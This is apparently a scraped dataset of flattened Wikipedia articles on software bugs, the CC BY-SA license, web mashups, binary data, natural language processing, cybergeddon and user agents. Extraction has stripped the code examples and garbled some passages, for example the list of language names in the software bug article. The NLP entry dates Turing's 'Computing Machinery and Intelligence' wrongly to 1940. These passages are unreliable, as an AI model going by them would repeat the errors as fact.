348 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Software_bug | A software bug is a bug in computer software. A computer program with many or serious bugs may be described as buggy. The effects of a software bug range from minor (such as a misspelled word in the user interface) to severe (such as frequent crashing). Software bugs have been linked to disasters. Software bugs in the Therac 25 radiation therapy machine were directly responsible for patient deaths in the 1980s. In 1996, the European Space Agency's US$1 billion prototype Ariane 5 rocket was destroyed less than a minute after launch due to a bug in the on-board guidance computer program. 1 In 1994, an RAF Chinook helicopter crashed, killing 29; was initially blamed on pilot error, but was later thought to have been caused by a software bug in the engine-control computer. 2 Buggy software caused the early 21st century British Post Office scandal. 3 In 2002, a study commissioned by the US Department of Commerce's National Institute of Standards and Technology concluded that "software bugs, or errors, are so prevalent and so detrimental that they cost the US economy an estimated $59 billion annually, or about 0.6 percent of the gross domestic product". 4 Since the 1950s, some computer systems have been designed to detect or auto-correct various software errors during operations. Mistake metamorphism (from Greek meta "change", morph "form") refers to the evolution of a defect in the final stage of software deployment. Transformation of a "mistake" committed by an analyst in the early stages of the software development lifecycle, which leads to a "defect" in the final stage of the cycle has been called 'mistake metamorphism'. 5 Different stages of a mistake in the development cycle may be described as mistake, 6 : 31 anomaly, 6 : 10 fault, 6 : 31 failure, 6 : 31 error, 6 : 31 exception, 6 : 31 crash, 6 : 22 glitch, bug, 6 : 14 defect, incident, 6 : 39 or side effect. Sometimes the use of bug to describe the behavior of software is contentious due to perception. Some suggest that the term should be abandoned; replaced with defect or error. Some contend that bug implies that the defect arose on its own and push to use defect instead since it more clearly connotates caused by a human. 7 Some contend that bug may be used to coverup an intentional design decision. In 2011, after receiving scrutiny from US Senator Al Franken for recording and storing users' locations in unencrypted files, 8 Apple called the behavior a bug. However, Justin Brookman of the Center for Democracy and Technology directly challenged that portrayal, stating "I'm glad that they are fixing what they call bugs, but I take exception with their strong denial that they track users. 9 Preventing bugs as early as possible in the software development process is a target of investment and innovation. 10 11 Newer programming languages tend to be designed to prevent common bugs based on vulnerabilities of existing languages. Lessons learned from older languages such as BASIC and C are used to inform the design of later languages such as C and Rust. Languages may include features such as a static type system, restricted namespaces and modular programming. For example, for a typed, compiled language (like C): is syntactically correct, but fails type checking since the right side, a string, cannot be assigned to a float variable. Compilation fails forcing this defect to be fixed before development progress can resume. With an interpreted language, a failure would not occur until later at runtime. Some languages exclude features that easily lead to bugs, at the expense of slower performance the principle being that it is usually better to write simpler, slower correct code than complicated, buggy code. For example, the Java does not support pointer arithmetic which is generally fast, but is considered dangerous; relatively easy to cause a major bug. Some languages include features that add runtime overhead in order to prevent some bugs. For example, many languages include runtime bounds checking and a way to handle out-of-bounds conditions instead of crashing. A compiled language allows for detecting some typos (such as a misspelled identifier) before runtime which is earlier in the software development process than for an interpreted language. Programming techniques such as programming style and defensive programming are intended to prevent typos. For example, a bug may be caused by a relatively minor, typographical error (typo) in the code. For example, this code executes function foo only if conditionis true. But this code always executes foo: A convention that tends to prevent this particular issue is to require braces for a block even if it has just one line. Enforcement of conventions may be manual (i.e. via code review) or via automated tools. Some contend that writing a program specification which states the behavior of a program, can prevent bugs. Some contend that formal specifications are impractical for anything but the shortest programs, because of problems of combinatorial explosion and indeterminacy. One goal of software testing is to find bugs. Measurements during testing can provide an estimate of the number of likely bugs remaining. This becomes more reliable the longer a product is tested and developed. citation needed Agile software development may involve frequent software releases with relatively small changes. Defects are revealed by user feedback. With test-driven development (TDD), unit tests are written while writing the production code, and the production code is not considered complete until all tests complete successfully. Tools for static code analysis help developers by inspecting the program text beyond the compiler's capabilities to spot potential problems. Although in general the problem of finding all programming errors given a specification is not solvable (see halting problem), these tools exploit the fact that human programmers tend to make certain kinds of simple mistakes often when writing software. Tools to monitor the performance of the software as it is running, either specifically to find problems such as bottlenecks or to give assurance as to correct working, may be embedded in the code explicitly (perhaps as simple as a statement saying PRINT "I AM HERE"), or provided as tools. It is often a surprise to find where most of the time is taken by a piece of code, and this removal of assumptions might cause the code to be rewritten. Open source development allows anyone to examine source code. A school of thought popularized by Eric S. Raymond as Linus's law says that popular open-source software has more chance of having few or no bugs than other software, because "given enough eyeballs, all bugs are shallow". 12 This assertion has been disputed, however: computer security specialist Elias Levy wrote that "it is easy to hide vulnerabilities in complex, little understood and undocumented source code, because, "even if people are reviewing the code, that doesn't mean they're qualified to do so. 13 An example of an open-source software bug was the 2008 OpenSSL vulnerability in Debian. Debugging can be a significant part of the software development lifecycle. Maurice Wilkes, an early computing pioneer, described his realization in the late 1940s that “a good part of the remainder of my life was going to be spent in finding errors in my own programs”. 14 A program known as a debugger can help a programmer find faulty code by examining the inner workings of a program such as executing code line-by-line and viewing variable values. As an alternative to using a debugger, code may be instrumented with logic to output debug information to trace program execution and view values. Output is typically to console, window, log file or a hardware output (i.e. LED). Some contend that locating a bug is something of an art. It is not uncommon for a bug in one section of a program to cause failures in a different section, citation needed thus making it difficult to track, in an apparently unrelated part of the system. For example, an error in a graphics rendering routine causing a file I O routine to fail. Sometimes, the most difficult part of debugging is finding the cause of the bug. Once found, correcting the problem is sometimes easy if not trivial. Sometimes, a bug is not an isolated flaw, but represents an error of thinking or planning on the part of the programmers. Often, such a logic error requires a section of the program to be overhauled or rewritten. Some contend that as a part of code review, stepping through the code and imagining or transcribing the execution process may often find errors without ever reproducing the bug as such. Typically, the first step in locating a bug is to reproduce it reliably. If unable to reproduce the issue, a programmer cannot find the cause of the bug and therefore cannot fix it. Some bugs are revealed by inputs that may be difficult for the programmer to re-create. One cause of the Therac 25 radiation machine deaths was a bug (specifically, a race condition) that occurred only when the machine operator very rapidly entered a treatment plan; it took days of practice to become able to do this, so the bug did not manifest in testing or when the manufacturer attempted to duplicate it. Other bugs may stop occurring whenever the setup is augmented to help find the bug, such as running the program with a debugger; these are called heisenbugs (humorously named after the Heisenberg uncertainty principle). Since the 1990s, particularly following the Ariane 5 Flight 501 disaster, interest in automated aids to debugging rose, such as static code analysis by abstract interpretation. 15 Often, bugs come about during coding, but faulty design documentation may cause a bug. In some cases, changes to the code may eliminate the problem even though the code then no longer matches the documentation. In an embedded system, the software is often modified to work around a hardware bug since it's cheaper than modifying the hardware. Bugs are managed via activities like documenting, categorizing, assigning, reproducing, correcting and releasing the corrected code. Tools are often used to track bugs and other issues with software. Typically, different tools are used by the software development team to track their workload than by customer service to track user feedback. 16 A tracked item is often called bug, defect, ticket, issue, feature, or for agile software development, story or epic. Items are often categorized by aspects such as severity, priority and version number. In a process sometimes called triage, choices are made for each bug about whether and when to fix it based on information such as the bug's severity and priority and external factors such as development schedules. Triage generally does not include investigation into cause. Triage may occur regularly. Triage generally consists of reviewing new bugs since the previous triage and maybe all open bugs. Attendees may include project manager, development manager, test manager, build manager, and technical experts. 17 18 Severity is a measure of impact the bug has. 19 This impact may be data loss, financial, loss of goodwill and wasted effort. Severity levels are not standardized, but differ by context such as industry and tracking tool. For example, a crash in a video game has a different impact than a crash in a bank server. Severity levels might be crash or hang, no workaround (user cannot accomplish a task), has workaround (user can still accomplish the task), visual defect (a misspelling for example), or documentation error. Another example set of severities: critical, high, low, blocker, trivial. 20 The severity of a bug may be a separate category to its priority for fixing, or the two may be quantified and managed separately. A bug severe enough to delay the release of the product is called a show stopper. 21 22 Priority describes the importance of resolving the bug in relation to other bugs. Priorities might be numerical, such as 1 through 5, or named, such as critical, high, low, and deferred. The values might be similar or identical to severity ratings, even though priority is a different aspect. Priority may be a combination of the bug's severity with the level of effort to fix. A bug with low severity but easy to fix may get a higher priority than a bug with moderate severity that requires significantly more effort to fix. Bugs of sufficiently high priority may warrant a special release which is sometimes called a patch. A software release that emphasizes bug fixes may be called a maintenance release to differentiate it from a release that emphasizes new features or other changes. It is common practice to release software with known, low-priority bugs or other issues. Possible reasons include but are not limited to: The amount and type of damage a software bug may cause affects decision-making, processes and policy regarding software quality. In applications such as human spaceflight, aviation, nuclear power, health care, public transport or automotive safety, since software flaws have the potential to cause human injury or even death, such software will have far more scrutiny and quality control than, for example, an online shopping website. In applications such as banking, where software flaws have the potential to cause serious financial damage to a bank or its customers, quality control is also more important than, say, a photo editing application. Other than the damage caused by bugs, some of their cost is due to the effort invested in fixing them. In 1978, Lientz et al. showed that the median of projects invest 17 percent of the development effort in bug fixing. 25 In 2020, research on GitHub repositories showed the median is 20%. 26 In 1994, NASA's Goddard Space Flight Center managed to reduce their average number of errors from 4.5 per 1000 lines of code (SLOC) down to 1 per 1000 SLOC. 27 Another study in 1990 reported that exceptionally good software development processes can achieve deployment failure rates as low as 0.1 per 1000 SLOC. 28 This figure is iterated in literature such as Code Complete by Steve McConnell, 29 and the NASA study on Flight Software Complexity. 30 Some projects even attained zero defects: the firmware in the IBM Wheelwriter typewriter which consists of 63,000 SLOC, and the Space Shuttle software with 500,000 SLOC. 28 To facilitate reproducible research on testing and debugging, researchers use curated benchmarks of bugs: Some notable types of bugs: A bug can be caused by insufficient or incorrect design based on the specification. For example, given that the specification is to alphabetize a list of words, a design bug might occur if the design does not account for symbols; resulting in incorrect alphabetization of words with symbols. Numerical operations can result in unexpected output, slow processing, or crashing. 33 Such a bug can be from a lack of awareness of the qualities of the data storage such as a loss of precision due to rounding, numerically unstable algorithms, arithmetic overflow and underflow, or from lack of awareness of how calculations are handled by different software coding languages such as division by zero which in some languages may throw an exception, and in others may return a special value such as NaN or infinity. A control flow bug, a.k.a. logic error, is characterized by code that does not fail with an error, but does not have the expected behavior, such as infinite looping, infinite recursion, incorrect comparison in a conditional such as using the wrong comparison operator, and the off-by-one error. The Open Technology Institute, run by the group, New America, 38 released a report "Bugs in the System" in August 2016 stating that U.S. policymakers should make reforms to help researchers identify and address software bugs. The report "highlights the need for reform in the field of software vulnerability discovery and disclosure. 39 One of the report's authors said that Congress has not done enough to address cyber software vulnerability, even though Congress has passed a number of bills to combat the larger issue of cyber security. 39 Government researchers, companies, and cyber security experts are the people who typically discover software flaws. The report calls for reforming computer crime and copyright laws. 39 The Computer Fraud and Abuse Act, the Digital Millennium Copyright Act and the Electronic Communications Privacy Act criminalize and create civil penalties for actions that security researchers routinely engage in while conducting legitimate security research, the report said. 39 |
349 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Text_of_the_Creative_Commons_Attribution-ShareAlike_4.0_International_License | You are free: for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Under the following terms: Notices: By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. Your exercise of the Licensed Rights is expressly made subject to the following conditions. Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the "Licensor. The text of the Creative Commons public licenses is dedicated to the public domain under the CC0 Public Domain Dedication. Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at creativecommons.org policies, Creative Commons does not authorize the use of the trademark "Creative Commons" or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. |
350 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:All_articles_with_unsourced_statements | This is a category to help keep count of the total number of articles with the citation needed template. They should all be in one of the dated categories, which can be found at Category:Articles with unsourced statements. With 524,048 articles in this category, it can be hard to choose which one to work on. The Citation Hunt tool makes the task easier by suggesting random articles, which can be sorted by topic-category membership. The following 200 pages are in this category, out of approximately 524,048 total. This list may not reflect recent changes. |
351 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_mashup | A mashup (computer industry jargon), in web development, is a web page or web application that uses content from more than one source to create a single new service displayed in a single graphical interface. For example, a user could combine the addresses and photographs of their library branches with a Google map to create a map mashup. 1 The term implies easy, fast integration, frequently using open application programming interfaces (open API) and data sources to produce enriched results that were not necessarily the original reason for producing the raw source data. The term mashup originally comes from creating something by combining elements from two or more sources. 2 The main characteristics of a mashup are combination, visualization, and aggregation. It is important to make existing data more useful, for personal and professional use. To be able to permanently access the data of other services, mashups are generally client applications or hosted online. In the past years when? , more and more Web applications have published APIs that enable software developers to easily integrate data and functions the SOA way, instead of building them by themselves. Mashups can be considered to have an active role in the evolution of social software and Web 2.0. Mashup composition tools are usually simple enough to be used by end-users. They generally do not require programming skills and rather support visual wiring of GUI widgets, services and components together. Therefore, these tools contribute to a new vision of the Web, where users are able to contribute. clarification needed The term "mashup" is not formally defined by any standard-setting body. 3 The broader context of the history of the Web provides a background for the development of mashups. Under the Web 1.0 model, organizations stored consumer data on portals and updated them regularly. They controlled all the consumer data, and the consumer had to use their products and services to get the information. citation needed The advent of Web 2.0 introduced Web standards that were commonly and widely adopted across traditional competitors and which unlocked the consumer data. At the same time, mashups emerged, allowing mixing and matching competitors' APIs to develop new services. The first mashups used mapping services or photo services to combine these services with data of any kind and therefore to produce visualizations of data. 4 failed verification In the beginning, most mashups were consumer-based, but recently when? the mashup is to be seen by whom? as an interesting concept useful also to enterprises. Business mashups can combine existing internal data with external services to generate new views on the data. There was also the free Yahoo Pipes to build mashups for free using the Yahoo Query Language. There are many types of mashup, such as business mashups, consumer mashups, and data mashups. 5 The most common type of mashup is the consumer mashup, aimed at the general public. Mashups can also be categorized by the basic API type they use but any of these can be combined with each other or embedded into other applications. In technology, a mashup enabler is a tool for transforming incompatible IT resources into a form that allows them to be easily combined, in order to create a mashup. Mashup enablers allow powerful techniques and tools (such as mashup platforms) for combining data and services to be applied to new kinds of resources. An example of a mashup enabler is a tool for creating an RSS feed from a spreadsheet (which cannot easily be used to create a mashup). Many mashup editors include mashup enablers, for example, Presto Mashup Connectors, Convertigo Web Integrator or Caspio Bridge. Mashup enablers have also been described as "the service and tool providers, sic that make mashups possible". citation needed Early mashups were developed manually by enthusiastic programmers. However, as mashups became more popular, companies began creating platforms for building mashups, which allow designers to visually construct mashups by connecting together mashup components. Mashup editors have greatly simplified the creation of mashups, significantly increasing the productivity of mashup developers and even opening mashup development to end-users and non-IT experts. Standard components and connectors enable designers to combine mashup resources in all sorts of complex ways with ease. Mashup platforms, however, have done little to broaden the scope of resources accessible by mashups and have not freed mashups from their reliance on well-structured data and open libraries (RSS feeds and public APIs). Mashup enablers evolved to address this problem, providing the ability to convert other kinds of data and services into mashable resources. Of course, not all valuable data is located within organizations. In fact, the most valuable information for business intelligence and decision support is often external to the organization. With the emergence of rich web applications and online Web portals, a wide range of business-critical processes (such as ordering) are becoming available online. Unfortunately, very few of these data sources syndicate content in RSS format and very few of these services provide publicly accessible APIs. Mashup editors therefore solve this problem by providing enablers or connectors. Mashups and portals are both content aggregation technologies. Portals are an older technology designed as an extension to traditional dynamic Web applications, in which the process of converting data content into marked-up Web pages is split into two phases: generation of markup "fragments" and aggregation of the fragments into pages. Each markup fragment is generated by a "portlet", and the portal combines them into a single Web page. Portlets may be hosted locally on the portal server or remotely on a separate server. Portal technology defines a complete event model covering reads and updates. A request for an aggregate page on a portal is translated into individual read operations on all the portlets that form the page ("render" operations on local, JSR 168 portlets or "getMarkup" operations on remote, WSRP portlets). If a submit button is pressed on any portlet on a portal page, it is translated into an update operation on that portlet alone (processAction on a local portlet or performBlockingInteraction on a remote, WSRP portlet). The update is then immediately followed by a read on all portlets on the page. Portal technology is about server-side, presentation-tier aggregation. It cannot be used to drive more robust forms of application integration such as two-phase commit. Mashups differ from portals in the following respects: The portal model has been around longer and has had greater investment and product research. Portal technology is therefore more standardized and mature. Over time, increasing maturity and standardization of mashup technology will likely make it more popular than portal technology because it is more closely associated with Web 2.0 and lately Service-oriented Architectures (SOA). 7 New versions of portal products are expected to eventually add mashup support while still supporting legacy portlet applications. Mashup technologies, in contrast, are not expected to provide support for portal standards. Mashup uses are expanding in the business environment. Business mashups are useful for integrating business and data services, as business mashups technologies provide the ability to develop new integrated services quickly, to combine internal services with external or personalized information, and to make these services tangible to the business user through user-friendly Web browser interfaces. 8 Business mashups differ from consumer mashups in the level of integration with business computing environments, security and access control features, governance, and the sophistication of the programming tools (mashup editors) used. Another difference between business mashups and consumer mashups is a growing trend of using business mashups in commercial software as a service (SaaS) offering. Many of the providers of business mashups technologies have added SOA features. The architecture of a mashup is divided into three layers: Architecturally, there are two styles of mashups: Web-based and server-based. Whereas Web-based mashups typically use the user's web browser to combine and reformat the data, server-based mashups analyze and reformat the data on a remote server and transmit the data to the user's browser in its final form. 9 Mashups appear to be a variation of a fa ade pattern. 10 That is: a software engineering design pattern that provides a simplified interface to a larger body of code (in this case the code to aggregate the different feeds with different APIs). Mashups can be used with software provided as a service (SaaS). After several years of standards development, mainstream businesses are starting to adopt service-oriented architectures (SOA) to integrate disparate data by making them available as discrete Web services. Web services provide open, standardized protocols to provide a unified means of accessing information from a diverse set of platforms (operating systems, programming languages, applications). These Web services can be reused to provide completely new services and applications within and across organizations, providing business flexibility. |
352 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Binary_data | Binary data is data whose unit can take on only two possible states. These are often labelled as 0 and 1 in accordance with the binary numeral system and Boolean algebra. Binary data occurs in many different technical and scientific fields, where it can be called by different names including bit (binary digit) in computer science, truth value in mathematical logic and related domains and binary variable in statistics. A discrete variable that can take only one state contains zero information, and 2 is the next natural number after 1. That is why the bit, a variable with only two possible values, is a standard primary unit of information. A collection of n bits may have 2n states: see binary number for details. Number of states of a collection of discrete variables depends exponentially on the number of variables, and only as a power law on number of states of each variable. Ten bits have more (1024) states than three decimal digits (1000). 10k bits are more than sufficient to represent an information (a number or anything else) that requires 3k decimal digits, so information contained in discrete variables with 3, 4, 5, 6, 7, 8, 9, 10... states can be ever superseded by allocating two, three, or four times more bits. So, the use of any other small number than 2 does not provide an advantage. Moreover, Boolean algebra provides a convenient mathematical structure for collection of bits, with a semantic of a collection of propositional variables. Boolean algebra operations are known as "bitwise operations" in computer science. Boolean functions are also well-studied theoretically and easily implementable, either with computer programs or by so-named logic gates in digital electronics. This contributes to the use of bits to represent different data, even those originally not binary. In statistics, binary data is a statistical data type consisting of categorical data that can take exactly two possible values, such as "A" and "B", or "heads" and "tails". It is also called dichotomous data, and an older term is quantal data. 1 The two values are often referred to generically as "success" and "failure". 1 As a form of categorical data, binary data is nominal data, meaning the values are qualitatively different and cannot be compared numerically. However, the values are frequently represented as 1 or 0, which corresponds to counting the number of successes in a single trial: 1 (success…) or 0 (failure); see Counting. Often, binary data is used to represent one of two conceptually opposed values, e.g.: However, it can also be used for data that is assumed to have only two possible values, even if they are not conceptually opposed or conceptually represent all possible values in the space. For example, binary data is often used to represent the party choices of voters in elections in the United States, i.e. Republican or Democratic. In this case, there is no inherent reason why only two political parties should exist, and indeed, other parties do exist in the U.S., but they are so minor that they are generally simply ignored. Modeling continuous data (or categorical data of more than 2 categories) as a binary variable for analysis purposes is called dichotomization (creating a dichotomy). Like all discretization, it involves discretization error, but the goal is to learn something valuable despite the error: treating it as negligible for the purpose at hand, but remembering that it cannot be assumed to be negligible in general. A binary variable is a random variable of binary type, meaning with two possible values. Independent and identically distributed (i.i.d.) binary variables follow a Bernoulli distribution, but in general binary data need not come from i.i.d. variables. Total counts of i.i.d. binary variables (equivalently, sums of i.i.d. binary variables coded as 1 or 0) follow a binomial distribution, but when binary variables are not i.i.d., the distribution need not be binomial. Like categorical data, binary data can be converted to a vector of count data by writing one coordinate for each possible value, and counting 1 for the value that occurs, and 0 for the value that does not occur. 2 For example, if the values are A and B, then the data set A, A, B can be represented in counts as (1, 0), (1, 0), (0, 1). Once converted to counts, binary data can be grouped and the counts added. For instance, if the set A, A, B is grouped, the total counts are (2, 1): 2 A's and 1 B (out of 3 trials). Since there are only two possible values, this can be simplified to a single count (a scalar value) by considering one value as "success" and the other as "failure", coding a value of the success as 1 and of the failure as 0 (using only the coordinate for the "success" value, not the coordinate for the "failure" value). For example, if the value A is considered "success" (and thus B is considered "failure"), the data set A, A, B would be represented as 1, 1, 0. When this is grouped, the values are added, while the number of trial is generally tracked implicitly. For example, A, A, B would be grouped as 1 1 0 2 successes (out of n 3 displaystyle n 3 trials). Going the other way, count data with n 1 displaystyle n 1 is binary data, with the two classes being 0 (failure) or 1 (success). Counts of i.i.d. binary variables follow a binomial distribution, with n displaystyle n the total number of trials (points in the grouped data). Regression analysis on predicted outcomes that are binary variables is known as binary regression; when binary data is converted to count data and modeled as i.i.d. variables (so they have a binomial distribution), binomial regression can be used. The most common regression methods for binary data are logistic regression, probit regression, or related types of binary choice models. Similarly, counts of i.i.d. categorical variables with more than two categories can be modeled with a multinomial regression. Counts of non-i.i.d. binary data can be modeled by more complicated distributions, such as the beta-binomial distribution (a compound distribution). Alternatively, the relationship can be modeled without needing to explicitly model the distribution of the output variable using techniques from generalized linear models, such as quasi-likelihood and a quasibinomial model; see Overdispersion Binomial. In modern computers, binary data refers to any data represented in binary form rather than interpreted on a higher level or converted into some other form. At the lowest level, bits are stored in a bistable device such as a flip-flop. While most binary data has symbolic meaning (except for don't cares) not all binary data is numeric. Some binary data corresponds to computer instructions, such as the data within processor registers decoded by the control unit along the fetch-decode-execute cycle. Computers rarely modify individual bits for performance reasons. Instead, data is aligned in groups of a fixed number of bits, usually 1 byte (8 bits). Hence, "binary data" in computers are actually sequences of bytes. On a higher level, data is accessed in groups of 1 word (4 bytes) for 32 bit systems and 2 words for 64 bit systems. In applied computer science and in the information technology field, the term binary data is often specifically opposed to text-based data, referring to any sort of data that cannot be interpreted as text. The "text" vs. "binary" distinction can sometimes refer to the semantic content of a file (e.g. a written document vs. a digital image). However, it often refers specifically to whether the individual bytes of a file are interpretable as text (see character encoding) or cannot so be interpreted. When this last meaning is intended, the more specific terms binary format and text(ual) format are sometimes used. Semantically textual data can be represented in binary format (e.g. when compressed or in certain formats that intermix various sorts of formatting codes, as in the doc format used by Microsoft Word); contrarily, image data is sometimes represented in textual format (e.g. the X PixMap image format used in the X Window System). 1 and 0 are nothing but just two different voltage levels. You can make the computer understand 1 for higher voltage and 0 for lower voltage. There are many different ways to store two voltage levels. If you have seen floppy, then you will find a magnetic tape that has a coating of ferromagnetic material, this is a type of paramagnetic material that has domains aligned in a particular direction to give a remnant magnetic field even after removal of currents through materials or magnetic field. During loading of data in the magnetic tape, the magnetic field is passed in one direction to call the saved orientation of the domain 1 and for the magnetic field is passed in another direction, then the saved orientation of the domain is 0. In this way, generally, 1 and 0 data are stored. 3 |
353 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Natural_language_processing | Natural language processing (NLP) is an interdisciplinary subfield of computer science and artificial intelligence. It is primarily concerned with providing computers with the ability to process data encoded in natural language and is thus closely related to information retrieval, knowledge representation and computational linguistics, a subfield of linguistics. Typically data is collected in text corpora, using either rule-based, statistical or neural-based approaches in machine learning and deep learning. Major tasks in natural language processing are speech recognition, text classification, natural-language understanding, and natural-language generation. Natural language processing has its roots in the 1940s. 1 Already in 1940, Alan Turing published an article titled "Computing Machinery and Intelligence" which proposed what is now called the Turing test as a criterion of intelligence, though at the time that was not articulated as a problem separate from artificial intelligence. The proposed test includes a task that involves the automated interpretation and generation of natural language. The premise of symbolic NLP is well-summarized by John Searle's Chinese room experiment: Given a collection of rules (e.g., a Chinese phrasebook, with questions and matching answers), the computer emulates natural language understanding (or other NLP tasks) by applying those rules to the data it confronts. Up until the 1980s, most natural language processing systems were based on complex sets of hand-written rules. Starting in the late 1980s, however, there was a revolution in natural language processing with the introduction of machine learning algorithms for language processing. This was due to both the steady increase in computational power (see Moore's law) and the gradual lessening of the dominance of Chomskyan theories of linguistics (e.g. transformational grammar), whose theoretical underpinnings discouraged the sort of corpus linguistics that underlies the machine-learning approach to language processing. 8 In 2003, word n-gram model, at the time the best statistical algorithm, was outperformed by a multi-layer perceptron (with a single hidden layer and context length of several words trained on up to 14 million of words with a CPU cluster in language modelling) by Yoshua Bengio with co-authors. 9 In 2010, Tom Mikolov (then a PhD student at Brno University of Technology) with co-authors applied a simple recurrent neural network with a single hidden layer to language modelling, 10 and in the following years he went on to develop Word2vec. In the 2010s, representation learning and deep neural network-style (featuring many hidden layers) machine learning methods became widespread in natural language processing. That popularity was due partly to a flurry of results showing that such techniques 11 12 can achieve state-of-the-art results in many natural language tasks, e.g., in language modeling 13 and parsing. 14 15 This is increasingly important in medicine and healthcare, where NLP helps analyze notes and text in electronic health records that would otherwise be inaccessible for study when seeking to improve care 16 or protect patient privacy. 17 Symbolic approach, i.e., the hand-coding of a set of rules for manipulating symbols, coupled with a dictionary lookup, was historically the first approach used both by AI in general and by NLP in particular: 18 19 such as by writing grammars or devising heuristic rules for stemming. Machine learning approaches, which include both statistical and neural networks, on the other hand, have many advantages over the symbolic approach: Although rule-based systems for manipulating symbols were still in use in 2020, they have become mostly obsolete with the advance of LLMs in 2023. Before that they were commonly used: In the late 1980s and mid 1990s, the statistical approach ended a period of AI winter, which was caused by the inefficiencies of the rule-based approaches. 20 21 The earliest decision trees, producing systems of hard if then rules, were still very similar to the old rule-based approaches. Only the introduction of hidden Markov models, applied to part-of-speech tagging, announced the end of the old rule-based approach. A major drawback of statistical methods is that they require elaborate feature engineering. Since 2015, 22 the statistical approach has been replaced by the neural networks approach, using semantic networks 23 and word embeddings to capture semantic properties of words. Intermediate tasks (e.g., part-of-speech tagging and dependency parsing) are not needed anymore. Neural machine translation, based on then-newly-invented sequence-to-sequence transformations, made obsolete the intermediate steps, such as word alignment, previously necessary for statistical machine translation. The following is a list of some of the most commonly researched tasks in natural language processing. Some of these tasks have direct real-world applications, while others more commonly serve as subtasks that are used to aid in solving larger tasks. Though natural language processing tasks are closely intertwined, they can be subdivided into categories for convenience. A coarse division is given below. Based on long-standing trends in the field, it is possible to extrapolate future directions of NLP. As of 2020, three trends among the topics of the long-standing series of CoNLL Shared Tasks can be observed: 46 Most higher-level NLP applications involve aspects that emulate intelligent behaviour and apparent comprehension of natural language. More broadly speaking, the technical operationalization of increasingly advanced aspects of cognitive behaviour represents one of the developmental trajectories of NLP (see trends among CoNLL shared tasks above). Cognition refers to "the mental action or process of acquiring knowledge and understanding through thought, experience, and the senses. 47 Cognitive science is the interdisciplinary, scientific study of the mind and its processes. 48 Cognitive linguistics is an interdisciplinary branch of linguistics, combining knowledge and research from both psychology and linguistics. 49 Especially during the age of symbolic NLP, the area of computational linguistics maintained strong ties with cognitive studies. As an example, George Lakoff offers a methodology to build natural language processing (NLP) algorithms through the perspective of cognitive science, along with the findings of cognitive linguistics, 50 with two defining aspects: Ties with cognitive linguistics are part of the historical heritage of NLP, but they have been less frequently addressed since the statistical turn during the 1990s. Nevertheless, approaches to develop cognitive models towards technically operationalizable frameworks have been pursued in the context of various frameworks, e.g., of cognitive grammar, 53 functional grammar, 54 construction grammar, 55 computational psycholinguistics and cognitive neuroscience (e.g., ACT-R), however, with limited uptake in mainstream NLP (as measured by presence on major conferences 56 of the ACL). More recently, ideas of cognitive NLP have been revived as an approach to achieve explainability, e.g., under the notion of "cognitive AI". 57 Likewise, ideas of cognitive NLP are inherent to neural models multimodal NLP (although rarely made explicit) 58 and developments in artificial intelligence, specifically tools and technologies using large language model approaches 59 and new directions in artificial general intelligence based on the free energy principle 60 by British neuroscientist and theoretician at University College London Karl J. Friston. |
354 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cybergeddon | Cybergeddon (from tech. cyber , lit. "computer"; Hebrew: Megiddo, extracted from Har Megiddo ("mountain of final battle")) refers to cataclysm resulting from a large-scale sabotage of all computerized networks, systems and activities. It combines cyberterrorism, cyberwarfare, cybercrime, and hacktivism into scenarios of wide-scale internet disruption or economic collapse. 1 Economic or industrial infrastructure could be targeted, such as banks 2 or industrial control systems. 3 Since 2012, the number of Internet-based attacks and their complexity has increased. 4 "Cybergeddon is a possibility, FireEye CEO Ashar Aziz explained in an interview with Bloomberg: "Attacks on critical infrastructures such as the power grid or financial institutions could wreak havoc not just on United States economy, but in fact, the world economy. 5 The Defense Technical Information Center cited nuclear electromagnetic pulse attacks as a part of the military action that may bring about cybergeddon. 6 |
355 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/User_agent | On the Web, a user agent is a software agent responsible for retrieving and facilitating end-user interaction with Web content. 1 This includes all web browsers, such as Google Chrome and Safari, some email clients, standalone download managers like youtube-dl, and other command-line utilities like cURL. 2 The user agent is the client in a client server system. The HTTP User-Agent header is intended to clearly identify the agent to the server. 2 However, this header can be omitted or spoofed, 2 so some websites use other detection methods. This World Wide Web related article is a stub. You can help Wikipedia by expanding it. |
